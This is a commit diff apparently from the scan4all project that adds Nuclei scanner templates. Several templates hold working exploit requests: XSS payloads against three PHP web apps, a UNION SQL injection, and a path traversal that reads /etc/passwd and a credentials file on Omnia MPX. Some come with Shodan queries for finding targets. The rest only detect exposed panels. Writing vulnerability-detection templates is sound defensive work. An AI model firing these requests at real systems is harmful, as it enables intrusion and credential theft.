STRLCPY/scan4all

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2014/CVE-2014-8676.yaml

		skipped 15 lines
16	16		cvss-score: 5.3
17	17		cve-id: CVE-2014-8676
18	18		cwe-id: CWE-22
19		-	tags: cve,cve2014,soplanning,lfi,packetstorm
	19	+	tags: packetstorm,edb,seclists,cve,cve2014,soplanning,lfi
20	20
21	21		requests:
22	22		- method: GET
		skipped 13 lines

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-42663.yaml

1	+	id: CVE-2021-42663
2	+
3	+	info:
4	+	name: Online Event Booking and Reservation System version 2.3.0 - Cross Site Scripting
5	+	author: fxploit
6	+	severity: medium
7	+	description: \|
8	+	An HTML injection vulnerability exists in Sourcecodester Online Event Booking and Reservation System in PHP/MySQL via the msg parameter to /event-management/index.php. An attacker can leverage this vulnerability in order to change the visibility of the website. Once the target user clicks on a given link he will display the content of the HTML code of the attacker's choice.
9	+	reference:
10	+	- https://github.com/0xDeku/CVE-2021-42663
11	+	- https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html
12	+	- https://nvd.nist.gov/vuln/detail/CVE-2021-42663
13	+	- https://github.com/TheHackingRabbi/CVE-2021-42663
14	+	classification:
15	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
16	+	cvss-score: 4.3
17	+	cve-id: CVE-2021-42663
18	+	cwe-id: CWE-79
19	+	metadata:
20	+	verified: "true"
21	+	tags: cve,cve2021,xss
22	+
23	+	requests:
24	+	- raw:
25	+	- \|
26	+	POST /login.php HTTP/1.1
27	+	Host: {{Hostname}}
28	+	Content-Type: application/x-www-form-urlencoded
29	+
30	+	name={{username}}&pwd={{password}}
31	+
32	+	- \|
33	+	GET /views/index.php?msg=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
34	+	Host: {{Hostname}}
35	+
36	+	redirects: true
37	+	max-redirects: 2
38	+	cookie-reuse: true
39	+	matchers-condition: and
40	+	matchers:
41	+	- type: word
42	+	part: body
43	+	words:
44	+	- "</i><script>alert(document.domain)</script></div>"
45	+
46	+	- type: word
47	+	part: header
48	+	words:
49	+	- text/html
50	+
51	+	- type: status
52	+	status:
53	+	- 200
54	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2021/CVE-2021-42667.yaml

1	+	id: CVE-2021-42667
2	+
3	+	info:
4	+	name: Online Event Booking and Reservation System version 2.3.0 - SQL injection
5	+	author: fxploit
6	+	severity: critical
7	+	description: \|
8	+	A SQL Injection vulnerability exists in Sourcecodester Online Event Booking and Reservation System in PHP in event-management/views. An attacker can leverage this vulnerability in order to manipulate the sql query performed. As a result he can extract sensitive data from the web server and in some cases he can use this vulnerability in order to get a remote code execution on the remote web server.
9	+	reference:
10	+	- https://github.com/0xDeku/CVE-2021-42667
11	+	- https://www.sourcecodester.com/php/14241/online-event-booking-and-reservation-system-phpmysql.html
12	+	- https://nvd.nist.gov/vuln/detail/CVE-2021-42667
13	+	- https://github.com/TheHackingRabbi/CVE-2021-42667
14	+	classification:
15	+	cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
16	+	cvss-score: 9.8
17	+	cve-id: CVE-2021-42667
18	+	cwe-id: CWE-89
19	+	metadata:
20	+	verified: "true"
21	+	tags: cve,cve2021,sqli,authenticated
22	+
23	+	variables:
24	+	num: "999999999"
25	+
26	+	requests:
27	+	- raw:
28	+	- \|
29	+	POST /login.php HTTP/1.1
30	+	Host: {{Hostname}}
31	+	Content-Type: application/x-www-form-urlencoded
32	+
33	+	name={{username}}&pwd={{password}}
34	+
35	+	- \|
36	+	GET /views/?v=USER&ID=1%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2Cmd5({{num}})%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%3B--%20- HTTP/1.1
37	+	Host: {{Hostname}}
38	+
39	+	redirects: true
40	+	max-redirects: 2
41	+	cookie-reuse: true
42	+	matchers-condition: and
43	+	matchers:
44	+	- type: word
45	+	part: body
46	+	words:
47	+	- '{{md5(num)}}'
48	+
49	+	- type: status
50	+	status:
51	+	- 200
52	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-29004.yaml

1	+	id: CVE-2022-29004
2	+
3	+	info:
4	+	name: Diary Management System v1.0 - Cross-Site scripting
5	+	author: TenBird
6	+	severity: medium
7	+	description: \|
8	+	Diary Management System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the Name parameter in search-result.php.
9	+	reference:
10	+	- https://github.com/sudoninja-noob/CVE-2022-29004/blob/main/CVE-2022-29004.txt
11	+	- https://phpgurukul.com/e-diary-management-system-using-php-and-mysql/
12	+	- https://nvd.nist.gov/vuln/detail/CVE-2022-29004
13	+	classification:
14	+	cve-id: CVE-2022-29004
15	+	metadata:
16	+	verified: true
17	+	tags: cve,cve2022,xss,authenticated,edms
18	+
19	+	requests:
20	+	- raw:
21	+	- \|
22	+	POST /edms/login.php HTTP/1.1
23	+	Host: {{Hostname}}
24	+	Content-Type: application/x-www-form-urlencoded; charset=UTF-8
25	+
26	+	logindetail={{username}}&userpassword={{password}}&login=
27	+
28	+	- \|
29	+	POST /edms/search-result.php HTTP/1.1
30	+	Host: {{Hostname}}
31	+	Content-Type: application/x-www-form-urlencoded; charset=UTF-8
32	+
33	+	searchdata=<script>alert(document.domain);</script>
34	+
35	+	cookie-reuse: true
36	+	matchers-condition: and
37	+	matchers:
38	+	- type: word
39	+	part: body
40	+	words:
41	+	- 'Serach Result Against "<script>alert(document.domain);</script>'
42	+
43	+	- type: word
44	+	part: header
45	+	words:
46	+	- text/html
47	+
48	+	- type: status
49	+	status:
50	+	- 200
51	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-29005.yaml

1	+	id: CVE-2022-29005
2	+	info:
3	+	name: Online Birth Certificate System V1.2 - Stored Cross-Site scripting
4	+	author: TenBird
5	+	severity: medium
6	+	description: \|
7	+	Multiple cross-site scripting (XSS) vulnerabilities in the component /obcs/user/profile.php of Online Birth Certificate System v1.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the fname or lname parameters.
8	+	reference:
9	+	- https://github.com/sudoninja-noob/CVE-2022-29005/blob/main/CVE-2022-29005.txt
10	+	- https://phpgurukul.com/online-birth-certificate-system-using-php-and-mysql/
11	+	- https://nvd.nist.gov/vuln/detail/CVE-2022-29005
12	+	classification:
13	+	cve-id: CVE-2022-29005
14	+	metadata:
15	+	verified: true
16	+	tags: cve,cve2022,xss,obcs,authenticated
17	+
18	+	requests:
19	+	- raw:
20	+	- \|
21	+	POST /obcs/user/login.php HTTP/1.1
22	+	Host: {{Hostname}}
23	+	Content-Type: application/x-www-form-urlencoded; charset=UTF-8
24	+
25	+	mobno={{username}}&password={{password}}&login=
26	+
27	+	- \|
28	+	POST /obcs/user/profile.php HTTP/1.1
29	+	Host: {{Hostname}}
30	+	Content-Type: application/x-www-form-urlencoded; charset=UTF-8
31	+
32	+	fname=nuclei%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&lname=nuclei%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E&add=New+Delhi+India+110001&submit=
33	+
34	+	- \|
35	+	GET /obcs/user/dashboard.php HTTP/1.1
36	+	Host: {{Hostname}}
37	+
38	+	req-condition: true
39	+	redirects: true
40	+	max-redirects: 2
41	+	cookie-reuse: true
42	+	matchers:
43	+	- type: dsl
44	+	dsl:
45	+	- 'contains(all_headers_3, "text/html")'
46	+	- 'status_code_3 == 200'
47	+	- contains(body_3, 'admin-name\">nuclei<script>alert(document.domain);</script>')
48	+	condition: and
49	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/cves/2022/CVE-2022-36642.yaml

1	+	id: CVE-2022-36642
2	+
3	+	info:
4	+	name: Omnia MPX 1.5.0+r1 - Path Traversal
5	+	author: arafatansari,ritikchaddha,For3stCo1d
6	+	severity: high
7	+	description: \|
8	+	A local file disclosure vulnerability in /appConfig/userDB.json of Telos Alliance Omnia MPX Node through 1.5.0+r1 allows attackers to escalate privileges to root and execute arbitrary commands.
9	+	reference:
10	+	- https://www.exploit-db.com/exploits/50996
11	+	- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-36642
12	+	- https://cyber-guy.gitbook.io/cyber-guy/pocs/omnia-node-mpx-auth-bypass-via-lfd
13	+	classification:
14	+	cve-id: CVE-2022-36642
15	+	metadata:
16	+	verified: true
17	+	shodan-query: http.title:"Omnia MPX Node \| Login"
18	+	tags: cve,cve2022,lfi,traversal,omnia
19	+
20	+	requests:
21	+	- method: GET
22	+	path:
23	+	- "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..//etc/passwd"
24	+	- "{{BaseURL}}/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json"
25	+
26	+	stop-at-first-match: true
27	+	matchers-condition: or
28	+	matchers:
29	+	- type: regex
30	+	regex:
31	+	- "root:[x*]:0:0"
32	+
33	+	- type: word
34	+	part: body
35	+	words:
36	+	- '"username":'
37	+	- '"password":'
38	+	- '"mustChangePwd":'
39	+	- '"roleUser":'
40	+	condition: and
41	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposed-panels/appsmith-web-login.yaml

1	+	id: appsmith-web-login
2	+
3	+	info:
4	+	name: Appsmith Web Log In Panel
5	+	author: powerexploit
6	+	severity: info
7	+	description: Appsmith is a low code, open-source developer tool to build internal applications quickly. You can drag and drop pre-built widgets to build UI on a grid-style canvas.
8	+	reference:
9	+	- https://www.appsmith.com
10	+	metadata:
11	+	verified: true
12	+	shodan-query: http.title:"appsmith"
13	+	tags: panel,appsmith
14	+
15	+	requests:
16	+	- method: GET
17	+	path:
18	+	- "{{BaseURL}}/user/login"
19	+
20	+	matchers-condition: and
21	+	matchers:
22	+	- type: word
23	+	part: body
24	+	words:
25	+	- "<title>Appsmith</title>"
26	+
27	+	- type: status
28	+	status:
29	+	- 200
30	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/exposures/logs/redis-exception-error.yaml

1	+	id: redis-exception-error
2	+
3	+	info:
4	+	name: Redis Exception Connection Error Page
5	+	author: DhiyaneshDk
6	+	severity: low
7	+	reference:
8	+	- https://www.facebook.com/ExWareLabs/photos/pcb.5563308760399619/5563307330399762/
9	+	metadata:
10	+	verified: true
11	+	shodan-query: html:"redis.exceptions.ConnectionError"
12	+	tags: exposure,redis,logs
13	+
14	+	requests:
15	+	- method: GET
16	+	path:
17	+	- "{{BaseURL}}"
18	+
19	+	matchers-condition: and
20	+	matchers:
21	+	- type: word
22	+	part: body
23	+	words:
24	+	- 'redis.exceptions.ConnectionError'
25	+
26	+	- type: word
27	+	part: header
28	+	words:
29	+	- text/plain
30	+
31	+	- type: status
32	+	status:
33	+	- 500
34	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/misconfiguration/aws-xray-application.yaml

1	+	id: aws-xray-application
2	+
3	+	info:
4	+	name: AWS X-Ray Sample Application
5	+	author: DhiyaneshDk
6	+	severity: info
7	+	description: AWS X-Ray is a service that helps developers analyze and debug distributed applications.
8	+	reference:
9	+	- https://www.facebook.com/ExWareLabs/photos/a.361854183878462/5566269380103557/
10	+	metadata:
11	+	verified: true
12	+	shodan-query: title:"AWS X-Ray Sample Application"
13	+	tags: misconfig,aws,x-ray,amazon
14	+
15	+	requests:
16	+	- method: GET
17	+	path:
18	+	- "{{BaseURL}}"
19	+
20	+	matchers-condition: and
21	+	matchers:
22	+	- type: word
23	+	part: body
24	+	words:
25	+	- '<title>AWS X-Ray Sample Application</title>'
26	+
27	+	- type: word
28	+	part: header
29	+	words:
30	+	- text/html
31	+
32	+	- type: status
33	+	status:
34	+	- 200
35	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/misconfiguration/ec2-instance-information.yaml

1	+	id: ec2-instance-information
2	+
3	+	info:
4	+	name: EC2 Instance Information
5	+	author: DhiyaneshDk
6	+	severity: low
7	+	reference:
8	+	- https://www.facebook.com/ExWareLabs/photos/a.361854183878462/5567070616690100/
9	+	metadata:
10	+	verified: true
11	+	shodan-query: title:"EC2 Instance Information"
12	+	tags: misconfig,ec2,aws,amazon
13	+
14	+	requests:
15	+	- method: GET
16	+	path:
17	+	- "{{BaseURL}}"
18	+
19	+	matchers-condition: and
20	+	matchers:
21	+	- type: word
22	+	part: body
23	+	words:
24	+	- '<title>EC2 Instance Information</title>'
25	+
26	+	- type: word
27	+	part: header
28	+	words:
29	+	- text/html
30	+
31	+	- type: status
32	+	status:
33	+	- 200
34	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/misconfiguration/graphql/graphql-playground.yaml

1	+	id: graphql-playground
2	+
3	+	info:
4	+	name: GraphQL Playground
5	+	author: DhiyaneshDk
6	+	severity: unknown
7	+	reference:
8	+	- https://github.com/graphql/graphql-playground
9	+	metadata:
10	+	verified: true
11	+	shodan-query: title:"GraphQL Playground"
12	+	tags: misconfig,graphql
13	+
14	+	requests:
15	+	- method: GET
16	+	path:
17	+	- "{{BaseURL}}"
18	+
19	+	matchers-condition: and
20	+	matchers:
21	+	- type: word
22	+	part: body
23	+	words:
24	+	- '<title>GraphQL playground</title>'
25	+
26	+	- type: word
27	+	part: header
28	+	words:
29	+	- text/html
30	+
31	+	- type: status
32	+	status:
33	+	- 200
34	+

■ ■ ■ ■ ■ ■

config/nuclei-templates/misconfiguration/hivequeue-agent.yaml

1	+	id: hivequeue-agent
2	+
3	+	info:
4	+	name: HiveQueue Agent
5	+	author: DhiyaneshDk
6	+	severity: low
7	+	reference:
8	+	- https://www.facebook.com/ExWareLabs/photos/a.361854183878462/5555061814557647/
9	+	metadata:
10	+	verified: true
11	+	shodan-query: http.title:"HiveQueue"
12	+	tags: misconfig,hivequeue
13	+
14	+	requests:
15	+	- method: GET
16	+	path:
17	+	- "{{BaseURL}}/monitoring"
18	+
19	+	matchers-condition: and
20	+	matchers:
21	+	- type: word
22	+	part: body
23	+	words:
24	+	- '<title>HiveQueue Agent</title>'
25	+
26	+	- type: word
27	+	part: header
28	+	words:
29	+	- text/html
30	+
31	+	- type: status
32	+	status:
33	+	- 200
34	+

up PoCs 2022-09-06